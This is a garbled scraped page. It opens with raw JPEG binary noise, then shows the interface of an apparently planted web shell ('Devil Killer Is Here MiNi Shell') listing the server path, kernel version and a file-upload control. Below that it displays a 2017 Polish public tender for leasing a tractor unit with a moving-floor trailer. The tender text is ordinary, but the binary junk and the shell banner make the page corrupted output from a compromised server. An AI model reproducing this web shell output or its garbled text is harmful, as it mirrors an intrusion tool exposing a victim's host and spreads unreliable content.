JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20170424/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20170424/71801-N-2017.html

<BR/><p>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia (jeżeli dotyczy):  </p><a class='base announcementNumber' href='http://www.kgkkozienice.pl' target='_blank'>http://www.kgkkozienice.pl</a><br/><hr class='linkedItemsSeparator' /><div class="divRow_xforms"><div>
              Ogłoszenie nr 71801 - 2017
              z dnia 2017-04-24 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Kozienice: Dostawa w formie leasingu operacyjnego fabrycznie nowego zestawu ciągnika siodłowego z naczepą z ruchomą podłogą.<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Dostawy
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Kozienicka Gospodarka Komunalna Sp. z o.o., krajowy numer identyfikacyjny
              14151169400000, ul.
              ul. Przemysłowa 
              15,
              26-900 
              Kozienice, woj.
              mazowieckie, państwo
              Polska, tel.
              (48)6142403, e-mail
              biuro@kgkkozienice.pl, faks
              (48)6142403.
              <br />
              Adres strony internetowej (URL): www.kgkkozienice.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Inny: Spółka prawa handlowego</div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  tak
                <br />www.kgkkozienice.pl</div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.kgkkozienice.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />w formie pisemnej<br />
                Adres:
                <br />KGK Sp. z o.o. 26-900 Kozienice ul.Przemysowa 15</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Dostawa w formie leasingu operacyjnego fabrycznie nowego zestawu ciągnika siodłowego z naczepą z ruchomą podłogą.<br /><b>Numer referencyjny: </b>TI.280.11.2017<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                dostawy
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Nie
                </div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>OPIS PRZEDMIOTU ZAMÓWIENIA  
1.	Przedmiotem zamówienia jest dostawa w formie leasingu operacyjnego fabrycznie nowego zestawu ciągnika siodłowego z naczepą z ruchomą podłogą, zwana w dalej przedmiotem leasingu. 
2.	Wymagania dotyczące leasingu:
a)	umowa leasingu operacyjnego zostanie zawarta na 60 miesięcy - okres spłaty rat leasingowych,
b)	raty leasingowe ustalone ze zmiennym oprocentowaniem WIBOR 1M średnim z miesiąca poprzedzającego wystawienie faktury VAT,  
c)	raty leasingowe: 59 równych rat leasingowych,
d)	opłata wstępna 10% - wartości netto przedmiotu leasingu, 
e)	opłata końcowa 1% - wartości netto przedmiotu leasingu, 
f)	nie przewiduje się wystąpienia innych dodatkowych kosztów,
g)	wykup przedmiotu leasingu (depozyt gwarancyjny) za ostatnia ratę leasingową,
h)	waluta leasingu  PLN,
i)	Zamawiający zastrzega sobie prawo wyboru ubezpieczyciela, ponieważ sam będzie ponosił koszty ubezpieczenia przedmiotu leasingu,
j)	pozostałe warunki leasingu regulowane są przez wewnętrzny regulamin Leasingodawcy oraz postanowienia Kodeksu cywilnego.
3.	OPIS CIĄGNIKA SIODŁOWEGO
1)	Podwozie fabrycznie nowe rok produkcji nie starszy jak 2016 
2)	Silnik spełniający normę emisji spalin Euro 6 o mocy min 300kW  
3)	Podgrzewany filtr paliwa z separatorem wody  
4)	Sprzęgło jednotarczowe
5)	Elektroniczny ogranicznik prędkości
6)	Tempomat
7)	Sprężarka powietrza min 1 cylindrowa
8)	Osłona miski olejowej
9)	Siatka ochronna przeciw owadom przed chłodnicą
10)	Międzynarodowa dokumentacja dopuszczenia do eksploatacji
11)	Skrzynia biegów - min 8 biegów do przodu i jeden do tyłu
12)	Przystawka  odbioru mocy
13)	Wydech z boku po prawej stronie 
14)	Zasysanie powietrza u góry z suchym filtrem powietrza 
15)	Oś przednia min. 7 tonowa
16)	Przednie zawieszenie paraboliczne o dopuszczalnym obciążeniu max. 8 t
17)	Oś tylna min. 8,5 tonowa
18)	Tylne zawieszenie powietrzne o dopuszczalnym obciążeniu max 13 t
19)	Regulacja wysokości zawieszenia
20)	Przełożenie tylnego mostu min 2,60
21)	Blokada mechanizmu różnicowego
22)	Zbiornik paliwa min 380l i  min. 50l. AdBlue
23)	Wlew paliwa zamykany, wentylowany, do zamknięcia uniwersalnego 
24)	Korek zbiornika AdBlue zamykany
25)	Układ kierowniczy lewostronny z kierownicą regulowaną w dwóch płaszczyznach 
26)	Rozstaw osi w przedziale 3500 do 3700 mm
27)	Układ hamulcowy wyposażony w ABS, ASR, ESP,EBA
28)	Tarczowe hamulce osi przedniej i tylnej
29)	Przyłącze hamulcowe 2 przewodowe za kabiną kierowcy
30)	Osuszacz powietrza podgrzewany
31)	Belka przeciwnajazdowa przednia
32)	Siodło wysokość min. 150 mm z płytą siodłową min. 12 mm
33)	Platforma robocza ze stopniem i uchwytem
34)	Kabina o długości min 1800mm  i szerokości min. 2200mm
35)	Fotel kierowcy z zawieszeniem pneumatycznym
36)	Centralny zamek ze zdalnym sterowaniem
37)	Lusterka wsteczne ogrzewane i elektrycznie sterowane
38)	Lusterko krawężnikowe prawe ogrzewane i elektrycznie sterowane
39)	Kabina wyposażona w automatyczną klimatyzację, radio, radio CB
40)	Szyba przednia ze szkła zespolonego przyciemniana i ogrzewana
41)	Elektryczne podnośniki szyb
42)	Osłona przeciwsłoneczna przed szybą czołową
43)	Reflektory robocze na dachu kabiny
44)	Światła do jazdy dziennej
45)	Dodatkowe światła dalekosiężne i przeciwmgielne
46)	Elektryczny przewód spiralny 24V do naczepy
47)	Przewody hydrauliczne
48)	Przewód ABS
49)	Przewody powietrzne
50)	Gniazdo ABS za kabiną
51)	2 akumulatory min 175Ah
52)	Wyłącznik główny sterowany mechanicznie
53)	Opony o zwiększonej nośności dla zastosowania komunalnego
54)	Koło zapasowe
55)	Tachograf cyfrowy  aktywacja, kalibracja, legalizacja 
56)	Hydraulika do naczepy ruchoma podłoga
57)	Wyposażenie gaśnica , trójkąt ostrzegawczy , klin pod koło, apteczka, podnośnik hydrauliczny, przewód do pompowania powietrza, dywaniki, pokrowce na fotele
58)	Gwarancja min. 24 miesiące
4.	OPIS NACZEPY
1)	Zastosowanie: transport produktów sypkich, biomasy, trocin, śmieci, kompostu, płodów rolnych, towarów na paletach.
2)	Pojemność ładunkowa: min 89 m3
3)	Długość wewnętrzna: min 13 500 mm
4)	Długość wewnętrzna użytkowa: min 13 400 mm
5)	Długość całkowita naczepy :max. 14 000 mm
6)	Szerokość wewnętrzna: min.  2 4000 mm
7)	Szerokość zewnętrzna: max. 2 6000 mm
8)	Wysokość wewnętrzna: 2 600 mm  2 900 mm
9)	Wysokość zewnętrzna: max 4 000 mm
10)	Masa własna: max. 8.200 kg
11)	wysokość siodła max 1200 mm
12)	nacisk na siodło ciągnika max 12 500 kg
Podwozie:
1)	konstrukcja ramy podwozia naczepy przystosowana do zamontowania zabudowy i mechanizmu ruchomej podłogi 
2)	podłoga grubości min. 6 mm
3)	poprzeczki (Z  profile) przechodzące przez belki nośne
4)	sworzeń zaczepowy 2 calowy, zamontowany w płycie stalowej o grubości min. 8mm
Osie i ogumienie:
1)	trzy osie o nośności 9000 kg każda na zawieszeniu pneumatycznym
2)	hamulce tarczowe
3)	zawieszenie pneumatyczne z zaworem do podnoszenia i opuszczania
4)	bezazbestowe okładziny hamulcowe 
5)	z automatyczną regulacją luzu hamulcowego
6)	pierwsza oś podnoszona
7)	podnoszenie osi automatyczne ze wspomaganiem przyciskiem lub ręczne, mocowane na konsoli
Podparcie:
stalowe nogi podporowe obsługiwane jednostronnie
Koła i ogumienie
1)	6 szt. kół felgi stalowe
2)	koło zapasowe na feldze stalowej - 1szt.
Błotniki
1)	błotniki wykonane z czarnego tworzywa sztucznego,  okręgu mocowane nad każdym kołem, tylne z chlapaczami 
2)	mocowanie nadkoli na rurkach ocynkowanych, przykręcanych do ramy pojazdu
Wyposażenie podwozia
1)	wysuwana drabinka wejściowa mocowana pod podwoziem z tyłu z prawej strony pojazdu
2)	aluminiowy zderzak tylny mocowany na konsolach z lampami LED i uchylną klapą zakrywającą lampy
3)	boczne zderzaki ochronne, aluminiowe przed osiami z zamocowaniem uchylnym
4)	kosz podwójny na dwa koła zapasowe naczepy, montowany przed lub za osiami między belkami głównymi
5)	kliny pod koła mocowane na ocynkowanych prętach przy nogach podporowych -2szt
6)	skrzynka narzędziowa, plastikowa mocowana z prawej strony pojazdu
7)	zbiornik na wodę
8)	laska do zaczepiania plandeki dachowej mocowana na uchwytach zderzaków bocznych pod podwoziem z lewej lub prawej strony pojazdu
9)	drabinka aluminiowa dł. max; 3m mocowana na uchwytach zderzaków bocznych pod podwoziem z lewej lub prawej strony przed osiami
10)	szeroki chlapacz tylny, fartuch
11)	dodatkowe uchwyty na szczotkę i łopatę
Układ hamulcowy
1)	dwuprzewodowy układ powietrzny z automatyczną regulacją siły hamowania system ABS,
2)	automatyczny hamulec postojowy
3)	RSS  system stabilizacji toru jazdy
4)	zbiorniki powietrza  2szt 
5)	przewód powietrzny zasilający przymocowany do wspornika na ścianie czołowej.
6)	przyłącze pneumatyczne 
7)	zaworów hamulcowy, podnoszenie osi
Instalacja elektryczna / Oświetlenie
1)	instalacja elektryczna 24 V, wykonana zgodnie z obowiązującymi przepisami
2)	elektryczny przewód zasilający, zamontowany do wspornika na ścianie czołowej, ze standardowymi wtyczkami: 2x7
3)	światła tylne LED (pozycyjne/stop, światło cofania, przeciwmgielne), trójkąty odblaskowe 
4)	oświetlenie tablicy rejestracyjnej LED i podkładka tablicy wmontowane w zderzak tylny
5)	światła zewnętrzne lizaki zamontowane do boków lamp lub zderzaka tylnego
6)	pomarańczowe, obrysowe światła boczne mocowane do podwozia wzdłuż naczepy
7)	przednie, białe światła, mocowane w dolnych lub górnych narożnikach kłonic przednich
8)	tylne, czerwone światła obrysowe mocowane w górnych narożnikach kłonic
9)	tylne tablice wyróżniające, krótkie  montowane w pionie na drzwiach
Zabezpieczenie antykorozyjne podwozia
1)	śrutowane i lakierowane wszystkie elementy stalowe podwozia
2)	cynkowane wsporniki ściany czołowej
3)	aluminiowe zderzaki boczne
4)	błotniki z czarnego tworzywa sztucznego
5)	osie, piasty i nogi podporowe lakierowane w kolorze podwozia
Opis zabudowy aluminiowej
1)	ściana czołowa i boczne wykonane z profili aluminiowych szer. min. 350 mm i na całą wysokość zabudowy
2)	na zewnętrznej stronie ścianie czołowej przymocowany stalowy, ocynkowany podest do obsługi zwijania plandeki dachowej
3)	drabinki wejściowe do podestu po lewej lub prawej stronie lub z obu stron (jak najbliżej ściany przedniej)
4)	na ścianie czołowej zamontowana konsola do przyłączy elektrycznych i pneumatycznych
5)	aluminiowe drzwi tylne z uszczelkami i z jednym lub dwoma zewnętrznymi zamkami na każde skrzydło
6)	uchwyty utrzymujące otwarte drzwi mocowane do podwozia
7)	belki/poprzeczki dachowe usztywniające ściany boczne  2szt, demontowane
8)	belka dachowa tylna- uchylna
9)	przesuwna na rolkach aluminiowa ściana wewnętrzna zawieszona na łańcuchach z podłogową plandeką uszczelniającą dł: ok; 1200mm zawieszaną na ścianie i z uszczelnieniami bocznymi
10)	- aluminiowe odboje z tyłu podwozia
Mechanizm napędu
1)	hydrauliczny mechanizm napędu ruchomej podłogi  zamocowany między belkami głównymi po środku podwozia
2)	aluminiowe deski podłogowe gładkie lub karbowane grubości: 8 mm.
3)	sterowanie napędem ruchomej podłogi z konsoli mocowanej przed lub za osiami z lewej strony
4)	przewodowy pilot do sterowania ruchomą podłogą
5)	wyjście przewodów hydraulicznych w dolnej części ściany przedniej
Dach i plandeka
1)	plandeka dachowa o gramaturze min. 640g/m2  zwinięta na aluminiowej listwie i rolowana za pomocą korby na prawą (pobocze) stronę naczepy
2)	napinanie boczne zasuniętej plandeki dachu za pomocą pasów zaczepionych w uchwytach/ grzechotkach mocowanych do podwozia naczepy z lewej strony  min 4szt.
3)	napinanie przednie plandeki dachu za pomocą ekspanderów lub pasów mocowanych na ścianie przedniej i tylne za pomocą ekspanderów na belce dachowej tylnej
4)	gumowe odboje pod pasami zapinające plandekę dachu, mocowane na ścianie bocznej  min. 3 szt. w pionie na każdy pas
5)	gumowe odboje pod pasami mocowane na dolnym obrzeżu ściany bocznej  min.  1 szt. na każdy pas
6)	z prawej strony profilu bocznego u góry, zamontowane uchylne odboje do blokowania zwiniętej plandeki dachu  min. 4szt
7)	korba do zwijania plandeki, mocowana w uchwycie na ścianie przedniej przy balkonie
Oznaczenie konturowe
1)	żółte lub czerwone poziome i pionowe taśmy odblaskowe naklejane na drzwiach tylnych
2)	białe lub żółte poziome taśmy odblaskowe naklejane na dole ścian lub drzwi bocznych oraz w narożnikach górnych zabudowy
Lakierowanie zabudowy
1)	ściana przednia, boczna drzwi tylne lakierowane zewnętrznie 
2)	elementy gumowe i z tworzywa sztucznego - nie lakierowane
Gwarancja min. 24 m-ce.

Dostawa do siedziby Zamawiającego na koszt Wykonawcy.
<br /><br /><b>II.5) Główny kod CPV: </b>34130000-7<br /><b> Dodatkowe kody CPV:</b>34133000-8,
                66114000-2<br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    Okres w miesiącach: 60<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                Zamawiający nie określa warunku w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Zamawiający nie określa warunku w tym zakresie.<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                Zamawiający nie określa warunku w tym zakresie.<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">a) oświadczenie dotyczące przesłanek wykluczenia z postępowania (sporządzone w oparciu o złącznik nr 2),
b) odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy
</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Oświadczenie dotyczące spełniania warunków udziału w postępowaniu (sporządzone w oparciu o załącznik nr 3 do SIWZ).<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">Do oferty sporządzonej w oparciu o załącznik nr 1 do SIWZ, Wykonawca zobowiązany jest dołączyć następujące dokumenty:
a) dokumenty wymienione w pkt. V SIWZ (z wyłączeniem pkt. V.4)
b) pełnomocnictwo do reprezentowania w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego w przypadku składania oferty wspólnej w oparciu o art. 23 ustawy (oferta wspólna),
c) pełnomocnictwo do podpisania oferty o ile nie wynika ono z załączonych dokumentów do oferty (jeżeli dotyczy),
d) formularz cenowy / opłat leasingowych - sporządzony zgodnie z załącznikiem nr 1a do SIWZ,
e) katalogi reklamowe oferowanego przedmiotu zamówienia.
